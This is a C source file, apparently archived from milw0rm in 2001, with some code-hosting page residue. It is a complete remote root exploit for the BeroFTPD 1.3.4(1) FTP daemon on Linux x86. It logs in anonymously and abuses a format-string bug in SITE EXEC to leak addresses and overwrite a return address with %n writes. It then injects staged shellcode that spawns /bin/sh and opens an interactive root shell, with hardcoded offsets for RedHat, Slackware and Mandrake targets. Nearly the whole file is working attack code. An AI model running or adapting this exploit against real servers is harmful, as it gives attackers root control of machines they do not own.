402 lines
No EOL
9.4 KiB
C
402 lines
No EOL
9.4 KiB
C
/*
|
|
* BeroFTPD 1.3.4(1) Linux x86 remote root exploit
|
|
* by qitest1 - 5/05/2001
|
|
*
|
|
* BeroFTPD is an ftpd derived from wuftpd sources. This code
|
|
* exploits the format bug of the site exec cmd, well known to be
|
|
* present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1)
|
|
* is the current version at the moment.
|
|
*
|
|
* JUST SAMPLE CODE. For different platforms you have to try with
|
|
* different offsets for different retaddrs. You see.. =)
|
|
*
|
|
* Greets: Nail, Norby, Berserker.
|
|
* 69 rulez.. ;P
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <getopt.h>
|
|
#include <errno.h>
|
|
#include <netdb.h>
|
|
#include <unistd.h>
|
|
#include <string.h>
|
|
#include <netinet/in.h>
|
|
|
|
struct targ
|
|
{
|
|
int def;
|
|
char *descr;
|
|
unsigned long int enbuf;
|
|
int dawlen;
|
|
};
|
|
|
|
struct targ target[]=
|
|
{
|
|
{0, "RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz", 0xded, 6},
|
|
{1, "Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz", 0x1170, 12},
|
|
{2, "Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm", 0xdf1, 6},
|
|
{69, NULL, 0, 0}
|
|
};
|
|
|
|
/* 15 byte x86/linux PIC read() shellcode by lorian / teso
|
|
*/
|
|
unsigned char shellcode_read[] =
|
|
"\x33\xdb" /* xorl %ebx, %ebx */
|
|
"\xf7\xe3" /* mull %ebx */
|
|
"\xb0\x03" /* movb $3, %al */
|
|
"\x8b\xcc" /* movl %esp, %ecx */
|
|
"\x68\xb2\x00\xcd\x80" /* push 0x80CDxxB2 */
|
|
"\xff\xff\xe4"; /* jmp %esp */
|
|
|
|
unsigned char shellcode[] = /* Lam3rZ code */
|
|
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
|
|
"\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b"
|
|
"\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66"
|
|
"\xb9\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
|
|
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89"
|
|
"\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0"
|
|
"\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
|
|
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
|
|
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08"
|
|
"\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0"
|
|
"\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8"
|
|
"\x90\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
|
|
"\x2e\x2e\x31\x31";
|
|
|
|
char fmtstr[1024];
|
|
int sock;
|
|
int sel;
|
|
int offset;
|
|
unsigned long int retloc;
|
|
unsigned long int bufaddr;
|
|
unsigned long int tmpaddr;
|
|
|
|
void fmtstr_build(unsigned long int bufaddr, unsigned long int retloc);
|
|
void xpad_cat (unsigned char *fabuf, unsigned long int addr);
|
|
void retloc_find(void);
|
|
void shellami(int sock);
|
|
void login(void);
|
|
void usage(char *progname);
|
|
int conn2host(char *host, int port);
|
|
|
|
main(int argc, char *argv[])
|
|
{
|
|
char rbuf[1024];
|
|
char *host = NULL;
|
|
int cnt;
|
|
|
|
printf("\n BeroFTPD 1.3.4(1) exploit by qitest1\n\n");
|
|
if(argc == 1)
|
|
usage(argv[0]);
|
|
while((cnt = getopt(argc,argv,"h:t:o:")) != EOF)
|
|
{
|
|
switch(cnt)
|
|
{
|
|
case 'h':
|
|
host = strdup(optarg);
|
|
break;
|
|
case 't':
|
|
sel = atoi(optarg);
|
|
break;
|
|
case 'o':
|
|
offset = atoi(optarg);
|
|
break;
|
|
default:
|
|
usage(argv[0]);
|
|
break;
|
|
}
|
|
}
|
|
|
|
if(host == NULL)
|
|
usage(argv[0]);
|
|
|
|
printf("+Host: %s\n as: %s\n", host, target[sel].descr);
|
|
|
|
printf("+Connecting to %s...\n", host);
|
|
sock = conn2host(host, 21);
|
|
printf(" connected\n");
|
|
|
|
printf("+Receiving banner...\n");
|
|
recv(sock, rbuf, 1024, 0);
|
|
printf("%s", rbuf);
|
|
memset(rbuf, 0, 1024);
|
|
printf(" received\n");
|
|
|
|
printf("+Logging in...\n");
|
|
login();
|
|
printf(" logged in\n");
|
|
|
|
printf("+Searching retloc...\n");
|
|
retloc_find();
|
|
printf(" found: %p\n", retloc);
|
|
|
|
printf("+Searching bufaddr...\n");
|
|
bufaddr = tmpaddr + target[sel].enbuf;
|
|
printf(" found: %p + offset = ", bufaddr);
|
|
bufaddr += offset;
|
|
printf("%p\n", bufaddr);
|
|
|
|
printf("+Preparing shellcode...\n");
|
|
shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);
|
|
printf(" shellcode ready\n");
|
|
|
|
printf("+Building fmtstr...\n");
|
|
fmtstr_build(bufaddr, retloc);
|
|
printf(" fmtstr builded\n");
|
|
|
|
printf("+Sending fmtstr...\n");
|
|
send(sock, fmtstr, strlen(fmtstr), 0);
|
|
printf(" fmtstr sent\n");
|
|
recv(sock, rbuf, 1024, 0);
|
|
sleep(1);
|
|
send(sock, shellcode, strlen(shellcode), 0);
|
|
sleep(2);
|
|
printf("+Entering love mode...\n"); /* Nail teachs.. ;-) */
|
|
shellami(sock);
|
|
|
|
}
|
|
|
|
void
|
|
fmtstr_build(unsigned long int bufaddr, unsigned long int retloc)
|
|
{
|
|
int i;
|
|
int eat = 136;
|
|
int wlen = 428;
|
|
int tow;
|
|
int freespz;
|
|
char f[1024];
|
|
unsigned long int soul69 = 0x69696969; /* That's amore.. =) */
|
|
unsigned char retaddr[4];
|
|
|
|
for(i = 0; i < 4; ++i)
|
|
retaddr[i] = (bufaddr >> (i << 3)) & 0xff;
|
|
|
|
wlen -= target[sel].dawlen;
|
|
f[0] = 0;
|
|
for(i = 0; i < eat; i++)
|
|
strcat(f, "%.f");
|
|
|
|
strcat(fmtstr, "SITE EXEC ");
|
|
strcat(fmtstr, " ");
|
|
xpad_cat(fmtstr, retloc);
|
|
xpad_cat(fmtstr, soul69);
|
|
xpad_cat(fmtstr, retloc + 1);
|
|
xpad_cat(fmtstr, soul69);
|
|
xpad_cat(fmtstr, retloc + 2);
|
|
xpad_cat(fmtstr, soul69);
|
|
xpad_cat(fmtstr, retloc + 3);
|
|
strcat(fmtstr, f);
|
|
strcat(fmtstr, "%x");
|
|
|
|
/* Code by teso
|
|
*/
|
|
tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;
|
|
if (tow < 10) tow += 0x100;
|
|
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
|
|
wlen += tow;
|
|
|
|
tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;
|
|
if (tow < 10) tow += 0x100;
|
|
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
|
|
wlen += tow;
|
|
|
|
tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;
|
|
if (tow < 10) tow += 0x100;
|
|
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
|
|
wlen += tow;
|
|
|
|
tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;
|
|
if (tow < 10) tow += 0x100;
|
|
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
|
|
wlen += tow;
|
|
/* End here
|
|
*/
|
|
|
|
freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;
|
|
for(i = 0; i < freespz ; i++)
|
|
strcat(fmtstr, "\x90");
|
|
strcat(fmtstr, shellcode_read);
|
|
|
|
strcat(fmtstr, "\n");
|
|
|
|
}
|
|
|
|
/* Code by teso
|
|
*/
|
|
void xpad_cat (unsigned char *fabuf, unsigned long int addr)
|
|
{
|
|
int i;
|
|
unsigned char c;
|
|
|
|
for (i = 0 ; i <= 3 ; ++i) {
|
|
switch (i) {
|
|
case (0):
|
|
c = (unsigned char) ((addr & 0x000000ff) );
|
|
break;
|
|
case (1):
|
|
c = (unsigned char) ((addr & 0x0000ff00) >> 8);
|
|
break;
|
|
case (2):
|
|
c = (unsigned char) ((addr & 0x00ff0000) >> 16);
|
|
break;
|
|
case (3):
|
|
c = (unsigned char) ((addr & 0xff000000) >> 24);
|
|
break;
|
|
}
|
|
if (c == 0xff)
|
|
sprintf (fabuf + strlen (fabuf), "%c", c);
|
|
|
|
sprintf (fabuf + strlen (fabuf), "%c", c);
|
|
}
|
|
|
|
return;
|
|
}
|
|
/* End here
|
|
*/
|
|
|
|
void
|
|
retloc_find(void)
|
|
{
|
|
int i;
|
|
char rbuf[1024];
|
|
char sbuf[1024];
|
|
char *ptr;
|
|
|
|
strcpy(sbuf, "SITE EXEC ");
|
|
for(i = 0; i < 6; i++)
|
|
strcat(sbuf, "%p ");
|
|
strcat(sbuf, "\n");
|
|
send(sock, sbuf, strlen(sbuf), 0);
|
|
|
|
recv(sock, rbuf, 1024, 0);
|
|
ptr = rbuf;
|
|
for(i = 0; i < 5; i++)
|
|
{
|
|
while(*ptr != ' ')
|
|
ptr++;
|
|
ptr++;
|
|
}
|
|
ptr[strlen(ptr) - 2] = '\x00';
|
|
ptr[strlen(ptr) - 1] = '\x00';
|
|
sscanf(ptr, "%p", &retloc);
|
|
sscanf(ptr, "%p", &tmpaddr);
|
|
retloc -= 0x40;
|
|
|
|
}
|
|
|
|
void
|
|
shellami(int sock)
|
|
{
|
|
int n;
|
|
char recvbuf[1024];
|
|
char *cmd = "id; uname -a\n";
|
|
fd_set rset;
|
|
|
|
send(sock, cmd, strlen(cmd), 0);
|
|
|
|
while (1)
|
|
{
|
|
FD_ZERO(&rset);
|
|
FD_SET(sock,&rset);
|
|
FD_SET(STDIN_FILENO,&rset);
|
|
select(sock+1,&rset,NULL,NULL,NULL);
|
|
if (FD_ISSET(sock,&rset))
|
|
{
|
|
n=read(sock,recvbuf,1024);
|
|
if (n <= 0)
|
|
{
|
|
printf("Connection closed by foreign host.\n");
|
|
exit(0);
|
|
}
|
|
recvbuf[n]=0;
|
|
printf("%s",recvbuf);
|
|
}
|
|
if (FD_ISSET(STDIN_FILENO,&rset))
|
|
{
|
|
n=read(STDIN_FILENO,recvbuf,1024);
|
|
if (n>0)
|
|
{
|
|
recvbuf[n]=0;
|
|
write(sock,recvbuf,n);
|
|
}
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
|
|
int
|
|
conn2host(char *host, int port)
|
|
{
|
|
int sockfd;
|
|
struct hostent *he;
|
|
struct sockaddr_in their_addr;
|
|
|
|
if ((he=gethostbyname(host)) == NULL)
|
|
{
|
|
herror("gethostbyname");
|
|
exit(1);
|
|
}
|
|
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
|
|
{
|
|
perror("socket");
|
|
exit(1);
|
|
}
|
|
|
|
their_addr.sin_family = AF_INET;
|
|
their_addr.sin_port = htons(port);
|
|
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
|
|
bzero(&(their_addr.sin_zero), 8);
|
|
|
|
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
|
|
{
|
|
perror("connect");
|
|
exit(1);
|
|
}
|
|
|
|
return(sockfd);
|
|
|
|
}
|
|
|
|
void
|
|
login(void)
|
|
{
|
|
char *user = "USER anonymous\n";
|
|
char *pass = "PASS guest@\n";
|
|
char rbuf[1024];
|
|
|
|
send(sock, user, strlen(user), 0);
|
|
recv(sock, rbuf, 1024, 0);
|
|
memset(rbuf, 0, 1024);
|
|
send(sock, pass, strlen(pass), 0);
|
|
while(strstr(rbuf, "login ok") == NULL)
|
|
{
|
|
memset(rbuf, 0, 1024);
|
|
recv(sock, rbuf, 1024, 0);
|
|
}
|
|
|
|
}
|
|
|
|
void
|
|
usage(char *progname)
|
|
{
|
|
int i = 0;
|
|
|
|
printf("Usage: %s [options]\n", progname);
|
|
printf("Options:\n"
|
|
" -h hostname\n"
|
|
" -t target\n"
|
|
" -o offset\n"
|
|
"Available targets:\n");
|
|
while(target[i].def != 69)
|
|
{
|
|
printf(" %d) %s\n", target[i].def, target[i].descr);
|
|
i++;
|
|
}
|
|
|
|
exit(1);
|
|
|
|
}
|
|
|
|
|
|
// milw0rm.com [2001-05-08]
|